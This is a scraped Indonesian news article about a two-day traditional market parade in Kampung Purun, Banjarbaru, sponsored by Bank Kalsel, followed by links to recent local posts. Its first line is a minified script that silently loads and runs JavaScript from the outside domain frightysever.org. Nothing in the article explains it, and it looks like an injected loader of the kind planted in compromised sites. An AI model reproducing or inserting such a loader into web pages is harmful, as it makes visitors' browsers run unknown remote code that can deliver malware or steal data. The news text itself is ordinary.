(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Parade Pasar Tradisional Kampung Purun di Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Kota (Pemko) Banjarbaru menggelar pentas budaya selama dua hari, 10-11 April 2021. Event bertajuk Parade Pasar Tradisional Kampung Purun, hadirkan karya inovatif dan kreatif hasil olahan warga lokal.

Parade Pasar Tradisional Kampung Purun dipusatkan di Jalan Purnawirawan, Kelurahan Palam, Kecamatan Cempaka -Pendopo Serbaguna Kampung Purun-.
Tak ketinggalan, Bank Kalsel selaku lembaga jasa keuangan milik pemerintah daerah ikut andil menyukseskan kegiatan tersebut. Berupa bantuan sponsorship yang diserahkan kepada pihak panitia penyelenggara kegiatan.

Kepala Bank Kalsel Cabang Banjarbaru, Fachriza Nor Asli mengatakan, dukungan sponsorship merupakan salah satu bentuk kontribusi Bank Kalsel dalam mendukung kegiatan pemerintah maupun masyarakat sehingga peran bank daerah semakin dirasakan masyarakat luas.

Baca juga: Tim H2D Temukan Bakul Sembako Siap Bagi di Tambak Anyar

 

Bank Kalsel ikut andil membantu event Parade Pasar Tradisional Kampung Purun. Foto: ist

“Kami sangat mendukung terselenggaranya event Parade Pasar Tradisional Kampung Purun yang digelar Pemko,” terangnya.

Fachriza menyampaikan bahwa Bank Kalsel akan senantiasa mendukung kegiatan dari program-program yang dicanangkan Pemko Banjarbaru. Apalagi mengingat masih banyak aspek yang bisa terus dikembangkan di kota berjuluk Idaman tersebut.

Baca juga: ACT Kalsel Luncurkan Program Ramadhan 2.0 Aksi Tanpa Batas

“Bank Kalsel dan Pemko Banjarbaru akan selalu bersinergi. Di Banjarbaru ini masih banyak yang bisa dikembangkan, contohnya destinasi wisata berupa Kampung Tematik yang menonjolkan kearifan budaya lokal,” ujarnya.

Dengan diselenggarakannya kegiatan-kegiatan bertemakan budaya lokal, Fachriza meyakini nantinya juga turut berimbas ke sektor-sektor lain. “Pentas budaya seperti ini, saya yakin berdampak positif karena kearifan lokal budaya kita semakin dikenal. Salah satu yang kena imbasnya ialah sektor UMKM di Banjarbaru yang akan semakin meningkat,” bebernya.

Baca juga: Tanam Pohon di RTH Taman Demang Lehman

Di sisi lain, Wali Kota Banjarbaru, Aditya Mufti Ariffin, mengaku turut bersyukur atas segala bentuk dukungan yang diberikan Bank Kalsel. Apalagi katanya bantuan sposorship kali ini dapat menambah semangat masyarakat, terkhusus mereka yang berprofesi sebagai pengrajin.

“Kami sangat mengapresiasi kepada Bank Kalsel yang peduli terhadap kegiatan yang diselenggarakan oleh para pengrajin purun di Kota Banjarbaru. Semoga bantuan Bank Kalsel ini bisa menambah vitamin kepada pengrajin serta membantu membawa purun ke pentas yang lebih tinggi,” lugas Aditya. (kanalkalimantan.com/al)

Editor : kk


Al Ghifari

Recent Posts

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat… Read More

4 jam ago

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

7 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

7 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

9 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

11 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

12 jam ago

This website uses cookies.